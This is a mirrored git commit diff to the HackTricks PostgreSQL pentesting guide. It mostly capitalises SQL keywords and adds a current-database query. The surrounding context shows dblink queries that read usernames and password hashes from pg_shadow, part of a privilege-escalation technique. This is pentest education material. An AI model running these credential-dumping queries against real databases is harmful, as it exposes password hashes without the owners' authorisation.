mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
Merge pull request #696 from DeveloperOl/master
Update pentesting-postgresql.md
This commit is contained in:
commit
fae6f50ce8
|
@ -47,7 +47,10 @@ psql -h localhost -d <database_name> -U <User> #Password will be prompted
|
|||
\du+ # Get users roles
|
||||
|
||||
# Get current user
|
||||
Select user;
|
||||
SELECT user;
|
||||
|
||||
# Get current database
|
||||
SELECT current_catalog;
|
||||
|
||||
# List schemas
|
||||
SELECT schema_name,schema_owner FROM information_schema.schemata;
|
||||
|
@ -545,7 +548,7 @@ SELECT * FROM dblink('host=127.0.0.1
|
|||
user=someuser
|
||||
password=supersecret
|
||||
dbname=somedb',
|
||||
'Select usename,passwd from pg_shadow')
|
||||
'SELECT usename,passwd from pg_shadow')
|
||||
RETURNS (result TEXT);
|
||||
```
|
||||
|
||||
|
@ -563,7 +566,7 @@ If you have the password of a user with more privileges, but the user is not all
|
|||
SELECT * FROM dblink('host=127.0.0.1
|
||||
user=someuser
|
||||
dbname=somedb',
|
||||
'Select usename,passwd from pg_shadow')
|
||||
'SELECT usename,passwd from pg_shadow')
|
||||
RETURNS (result TEXT);
|
||||
```
|
||||
|
||||
|
|
Loading…
Reference in a new issue